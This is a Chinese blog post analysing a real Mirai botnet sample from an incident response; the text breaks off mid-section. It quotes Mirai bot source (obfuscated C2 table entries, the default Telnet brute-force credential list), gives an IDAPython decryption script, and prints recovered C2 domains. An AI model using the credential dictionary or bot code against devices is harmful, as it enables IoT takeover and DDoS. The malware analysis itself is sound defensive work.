<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"oneshell.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":true,"nav":{"gitalk":{"order":-2}},"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这是一次真实的应急事件，某个客户的设备被检测出来在持续向外发送大量的流量，疑似被控制作为DDoS肉鸡。经过上机排查进行流量抓包，的确是存在和DDoS攻击现象，也和恶意的CNC在进行通信。分析mirai样本前，我们首先需要明确分析的目的，此处需要分析得到的内容如下：  CNC会连地址：类似于获取C2的地址来进行溯源 弱口令字典：以便知道设备是如何沦陷的  CNC回连地址源码解析通过之前分析mirai">
<meta property="og:type" content="article">
<meta property="og:title" content="mirai源码分析：实战真实mirai样本1-有符号">
<meta property="og:url" content="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E5%AE%9E%E6%88%98%E7%9C%9F%E5%AE%9Emirai%E6%A0%B7%E6%9C%AC1-%E6%9C%89%E7%AC%A6%E5%8F%B7/index.html">
<meta property="og:site_name" content="OneShell">
<meta property="og:description" content="这是一次真实的应急事件，某个客户的设备被检测出来在持续向外发送大量的流量，疑似被控制作为DDoS肉鸡。经过上机排查进行流量抓包，的确是存在和DDoS攻击现象，也和恶意的CNC在进行通信。分析mirai样本前，我们首先需要明确分析的目的，此处需要分析得到的内容如下：  CNC会连地址：类似于获取C2的地址来进行溯源 弱口令字典：以便知道设备是如何沦陷的  CNC回连地址源码解析通过之前分析mirai">
<meta property="og:locale">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221226175836.png">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221226180231.png">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221226183019.png">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221226182849.png">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221226184625.png">
<meta property="article:published_time" content="2022-12-22T22:19:50.000Z">
<meta property="article:modified_time" content="2023-04-11T06:01:51.039Z">
<meta property="article:author" content="OneShell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://oneshell.top/images/Pastedimage20221226175836.png">

<link rel="canonical" href="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E5%AE%9E%E6%88%98%E7%9C%9F%E5%AE%9Emirai%E6%A0%B7%E6%9C%AC1-%E6%9C%89%E7%AC%A6%E5%8F%B7/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>mirai源码分析：实战真实mirai样本1-有符号 | OneShell</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">OneShell</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">I fight for a brighter tomorrow</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>Schedule</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://oneshell.top/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E5%AE%9E%E6%88%98%E7%9C%9F%E5%AE%9Emirai%E6%A0%B7%E6%9C%AC1-%E6%9C%89%E7%AC%A6%E5%8F%B7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="OneShell">
      <meta itemprop="description" content="ToT">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="OneShell">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          mirai源码分析：实战真实mirai样本1-有符号
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-12-23 06:19:50" itemprop="dateCreated datePublished" datetime="2022-12-23T06:19:50+08:00">2022-12-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-04-11 14:01:51" itemprop="dateModified" datetime="2023-04-11T14:01:51+08:00">2023-04-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Topics/" itemprop="url" rel="index"><span itemprop="name">Topics</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Topics/mirai/" itemprop="url" rel="index"><span itemprop="name">mirai</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这是一次真实的应急事件，某个客户的设备被检测出来在持续向外发送大量的流量，疑似被控制作为DDoS肉鸡。经过上机排查进行流量抓包，的确是存在和DDoS攻击现象，也和恶意的CNC在进行通信。<br>分析mirai样本前，我们首先需要明确分析的目的，此处需要分析得到的内容如下：</p>
<ol>
<li>CNC会连地址：类似于获取C2的地址来进行溯源</li>
<li>弱口令字典：以便知道设备是如何沦陷的</li>
</ol>
<h2 id="CNC回连地址"><a href="#CNC回连地址" class="headerlink" title="CNC回连地址"></a>CNC回连地址</h2><h3 id="源码解析"><a href="#源码解析" class="headerlink" title="源码解析"></a>源码解析</h3><p>通过之前分析mirai源码，可以知道CNC会连以及相关的配置是在函数<code>table_init</code>-&gt;<code>add_entry</code>中进行添加的，每次添加一条。bot源码如下，包含了CNC会连域名+端口，扫描成功结果反馈域名+端口。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">add_entry(TABLE_CNC_DOMAIN, <span class="string">&quot;\x4F\x4B\x50\x43\x4B\x0C\x41\x4C\x41\x22&quot;</span>, <span class="number">11</span>); <span class="comment">// mirai.cnc</span></span><br><span class="line">add_entry(TABLE_CNC_PORT, <span class="string">&quot;\x22\x35&quot;</span>, <span class="number">2</span>);   <span class="comment">// 23</span></span><br><span class="line"></span><br><span class="line">add_entry(TABLE_SCAN_CB_DOMAIN, <span class="string">&quot;\x4F\x4B\x50\x43\x4B\x0C\x41\x4C\x41\x22&quot;</span>, <span class="number">11</span>); <span class="comment">// mirai.cnc</span></span><br><span class="line">add_entry(TABLE_SCAN_CB_PORT, <span class="string">&quot;\x99\xC7&quot;</span>, <span class="number">2</span>);         <span class="comment">// 48101</span></span><br></pre></td></tr></table></figure>
<p>但是<code>add_entry</code>是将加密后的数据硬编码到bot中，如果想从样本中获取到解密后的数据，还需要分析样本作者可能自定义的加解密逻辑，如下是<code>add_entry</code>函数的逻辑，可以看到仅是简单的内存复制到<code>table</code>结构体中。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">add_entry</span><span class="params">(<span class="type">uint8_t</span> id, <span class="type">char</span> *buf, <span class="type">int</span> buf_len)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> *cpy = <span class="built_in">malloc</span>(buf_len);</span><br><span class="line"></span><br><span class="line">    util_memcpy(cpy, buf, buf_len);</span><br><span class="line"></span><br><span class="line">    table[id].val = cpy;</span><br><span class="line">    table[id].val_len = (<span class="type">uint16_t</span>)buf_len;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">    table[id].locked = TRUE;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>对于<code>table</code>结构体中的加密内容，会在bot的运行过程中根据需要对<code>table</code>中的内容进行实时的加解密，例如在解析CNC地址的时候，就会动态对<code>TABLE_CNC_DOMAIN</code>和<code>TABLE_CNC_PORT</code>进行解密，使用完毕后，再调用<code>table_lock_val</code>进行加密。通过使用这样的手段，可以防止硬编码的CNC数据被直接从样本静态分析中得到，也可以在一定程度防止某些动态扫描内存的手法从bot中获取到数据。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">resolve_cnc_addr</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">resolv_entries</span> *<span class="title">entries</span>;</span></span><br><span class="line"></span><br><span class="line">    table_unlock_val(TABLE_CNC_DOMAIN);</span><br><span class="line">    entries = resolv_lookup(table_retrieve_val(TABLE_CNC_DOMAIN, <span class="literal">NULL</span>));</span><br><span class="line">    table_lock_val(TABLE_CNC_DOMAIN);</span><br><span class="line">    <span class="keyword">if</span> (entries == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[main] Failed to resolve CNC address\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    srv_addr.sin_addr.s_addr = entries-&gt;addrs[rand_next() % entries-&gt;addrs_len];</span><br><span class="line">    resolv_entries_free(entries);</span><br><span class="line"></span><br><span class="line">    table_unlock_val(TABLE_CNC_PORT);</span><br><span class="line">    srv_addr.sin_port = *((<span class="type">port_t</span> *)table_retrieve_val(TABLE_CNC_PORT, <span class="literal">NULL</span>));</span><br><span class="line">    table_lock_val(TABLE_CNC_PORT);</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[main] Resolved domain\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="样本静态分析"><a href="#样本静态分析" class="headerlink" title="样本静态分析"></a>样本静态分析</h3><p>讲述完原理，接下来对样本进行静态分析就需要做两个工作：</p>
<ol>
<li>获取样本中硬编码的<code>table</code>中的CNC回连地址信息</li>
<li>逆向样本作者自定义的<code>table_unlocal_val</code>函数。<br>运气比较好，这个样本应该是出于开发或者实验阶段，作者居然没有去除掉样本的符号表，因此可以直接定位到<code>table_init</code>函数。其中的<code>add_entry</code>函数应该是被编译优化了，但是依旧可以从<code>uti_memcpy</code>函数中得到硬编码的加密数据存放的位置。<br><img src="/images/Pastedimage20221226175836.png" alt="undifined"><br>接下来就是获取解密函数<code>table_unlock_val</code>的逻辑，如下。<br><code>table_unlock_val</code>根据<code>table_id</code>获取到待解密的结构体，并获取到其中的数据存放指针<code>v2</code>。然后从全局变量<code>table_keys</code>中每轮取出4个字节，并使用这4个字节对待解密数据进行xor计算。解密逻辑还是比较清晰明了的。<br><img src="/images/Pastedimage20221226180231.png" alt="undifined"><br>接下来就是编写脚本对数据进行解密，我写了一个IDAPython脚本，大致的工作就是在<code>table_init</code>函数中，分析<code>util_memcpy</code>的调用传参，获取到硬编码的<code>table</code>数据所在，然后使用解密逻辑进行解密：<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> idc</span><br><span class="line"><span class="keyword">import</span> idautils</span><br><span class="line"></span><br><span class="line">ea = idc.get_name_ea_simple(<span class="string">&quot;util_memcpy&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># table_init范围内</span></span><br><span class="line">start = <span class="number">0x0000FA94</span></span><br><span class="line">end = <span class="number">0x0000FCC0</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 根据ARM传参规则，分析util_memcpy中的待解密数据地址</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">find_args</span>(<span class="params">addr</span>):</span><br><span class="line">    each_op = addr</span><br><span class="line">    tmp_args = &#123;</span><br><span class="line">        <span class="string">&quot;R1&quot;</span> : <span class="number">0</span>,</span><br><span class="line">        <span class="string">&quot;R2&quot;</span> : <span class="number">0</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> each_op &gt;= start:</span><br><span class="line">        op_disasm = idc.GetDisasm(each_op)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;LDR&quot;</span> <span class="keyword">in</span> op_disasm <span class="keyword">and</span> <span class="string">&quot;R1&quot;</span> <span class="keyword">in</span> op_disasm:</span><br><span class="line">            tmp_args[<span class="string">&quot;R1&quot;</span>] = each_op</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;MOV&quot;</span> <span class="keyword">in</span> op_disasm <span class="keyword">and</span> <span class="string">&quot;R2&quot;</span> <span class="keyword">in</span> op_disasm:</span><br><span class="line">            tmp_args[<span class="string">&quot;R2&quot;</span>] = each_op</span><br><span class="line">        <span class="keyword">if</span> tmp_args[<span class="string">&quot;R1&quot;</span>] != <span class="number">0</span> <span class="keyword">and</span> tmp_args[<span class="string">&quot;R2&quot;</span>] != <span class="number">0</span>:</span><br><span class="line">            <span class="comment"># print(hex(tmp_args[&quot;R1&quot;]), hex(tmp_args[&quot;R2&quot;]))</span></span><br><span class="line">            <span class="keyword">return</span> tmp_args</span><br><span class="line">        each_op = idc.prev_head(each_op)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 根据地址获取待解密数据</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_op_string</span>(<span class="params">addr</span>):</span><br><span class="line">    str_addr_list = <span class="built_in">list</span>(idautils.DataRefsFrom(addr))</span><br><span class="line">    data = []</span><br><span class="line">    start = str_addr_list[<span class="number">1</span>]</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        byte = idc.get_wide_byte(start + i)</span><br><span class="line">        <span class="keyword">if</span> byte == <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        data.append(byte)</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">    <span class="comment"># print(&quot;0x%x&quot; % start, data)</span></span><br><span class="line">    <span class="keyword">return</span> data, i</span><br><span class="line"></span><br><span class="line"><span class="comment"># 读取硬编码的table_keys</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">init_key</span>():</span><br><span class="line">    addr = <span class="number">0x00025C14</span></span><br><span class="line">    key = []</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        byte = idc.get_wide_byte(addr + i)</span><br><span class="line">        <span class="keyword">if</span> byte == <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        key.append(byte)</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">    <span class="keyword">return</span> key, i</span><br><span class="line"></span><br><span class="line"><span class="comment"># 真正的解密函数</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">data, key</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">80</span>, <span class="number">4</span>):</span><br><span class="line">        key1 = key[i]</span><br><span class="line">        key2 = key[i + <span class="number">1</span>]</span><br><span class="line">        key3 = key[i + <span class="number">2</span>]</span><br><span class="line">        key4 = key[i + <span class="number">3</span>]</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(data)):</span><br><span class="line">            data[j] ^= key1</span><br><span class="line">            data[j] ^= key2</span><br><span class="line">            data[j] ^= key3</span><br><span class="line">            data[j] ^= key4</span><br><span class="line">    result = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> each <span class="keyword">in</span> data:</span><br><span class="line">        result += <span class="built_in">chr</span>(each)</span><br><span class="line">    <span class="built_in">print</span>(result)</span><br><span class="line">   </span><br><span class="line"></span><br><span class="line">key, key_len = init_key()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> addr <span class="keyword">in</span> idautils.CodeRefsTo(ea, <span class="number">0</span>):</span><br><span class="line">    <span class="keyword">if</span> start &lt;= addr &lt; end:</span><br><span class="line">        args = find_args(addr)</span><br><span class="line">        arg1, arg_len = get_op_string(args[<span class="string">&quot;R1&quot;</span>])</span><br><span class="line">        <span class="comment"># print(arg1, arg_len)</span></span><br><span class="line">        encrypt(arg1, key)</span><br></pre></td></tr></table></figure>
执行结果如下，其中CNC地址和Telnet爆破成功数据返回地址就为<code>cjfop.xyz</code>和<code>sdfsd.xyz</code>，经过验证这和抓包数据中的通信地址吻合。<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">cjfop.xyz</span><br><span class="line">sdfsd.xyz</span><br><span class="line">gosh that chinese family at the other table sure ate a lot</span><br><span class="line">TSource Engine Query</span><br><span class="line">/proc/</span><br><span class="line">/exe</span><br><span class="line">/fd</span><br><span class="line">/cmdline</span><br><span class="line">enable</span><br><span class="line">system</span><br><span class="line">shell</span><br><span class="line">sh</span><br><span class="line">/bin/busybox BOTNET</span><br><span class="line">ncorrect</span><br><span class="line">BOTNET</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="弱口令字典"><a href="#弱口令字典" class="headerlink" title="弱口令字典"></a>弱口令字典</h2><h3 id="源码解析-1"><a href="#源码解析-1" class="headerlink" title="源码解析"></a>源码解析</h3><p>同样的，从mirai源码中，可以知道弱口令字典是在函数<code>scanner_init</code>-&gt;<code>add_auth_entry</code>进行添加的，如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set up passwords</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x5A\x41\x11\x17\x13\x13&quot;</span>, <span class="number">10</span>);                     <span class="comment">// root     xc3511</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x54\x4B\x58\x5A\x54&quot;</span>, <span class="number">9</span>);                          <span class="comment">// root     vizxv</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="number">8</span>);                          <span class="comment">// root     admin</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="number">7</span>);                      <span class="comment">// admin    admin</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x1A\x1A\x1A\x1A\x1A\x1A&quot;</span>, <span class="number">6</span>);                      <span class="comment">// root     888888</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x5A\x4F\x4A\x46\x4B\x52\x41&quot;</span>, <span class="number">5</span>);                  <span class="comment">// root     xmhdipc</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x46\x47\x44\x43\x57\x4E\x56&quot;</span>, <span class="number">5</span>);                  <span class="comment">// root     default</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x48\x57\x43\x4C\x56\x47\x41\x4A&quot;</span>, <span class="number">5</span>);              <span class="comment">// root     juantech</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x13\x10\x11\x16\x17\x14&quot;</span>, <span class="number">5</span>);                      <span class="comment">// root     123456</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x17\x16\x11\x10\x13&quot;</span>, <span class="number">5</span>);                          <span class="comment">// root     54321</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x51\x57\x52\x52\x4D\x50\x56&quot;</span>, <span class="string">&quot;\x51\x57\x52\x52\x4D\x50\x56&quot;</span>, <span class="number">5</span>);      <span class="comment">// support  support</span></span><br></pre></td></tr></table></figure>
<p>在函数<code>add_auth_entry</code>中，会调用解密函数<code>deobf</code>将硬编码的加密数据进行解密，然后保存到<code>auth_table</code>结构体中。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">add_auth_entry</span><span class="params">(<span class="type">char</span> *enc_user, <span class="type">char</span> *enc_pass, <span class="type">uint16_t</span> weight)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> tmp;</span><br><span class="line"></span><br><span class="line">    auth_table = <span class="built_in">realloc</span>(auth_table, (auth_table_len + <span class="number">1</span>) * <span class="keyword">sizeof</span> (<span class="keyword">struct</span> scanner_auth));</span><br><span class="line">    auth_table[auth_table_len].username = deobf(enc_user, &amp;tmp);</span><br><span class="line">    auth_table[auth_table_len].username_len = (<span class="type">uint8_t</span>)tmp;</span><br><span class="line">    auth_table[auth_table_len].password = deobf(enc_pass, &amp;tmp);</span><br><span class="line">    auth_table[auth_table_len].password_len = (<span class="type">uint8_t</span>)tmp;</span><br><span class="line">    auth_table[auth_table_len].weight_min = auth_table_max_weight;</span><br><span class="line">    auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;</span><br><span class="line">    auth_table_max_weight += weight;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>静态分析</h3><p>类似的，分析完源码之后，需要解决的就是两个问题：</p>
<ol>
<li>定位到硬编码的加密字典</li>
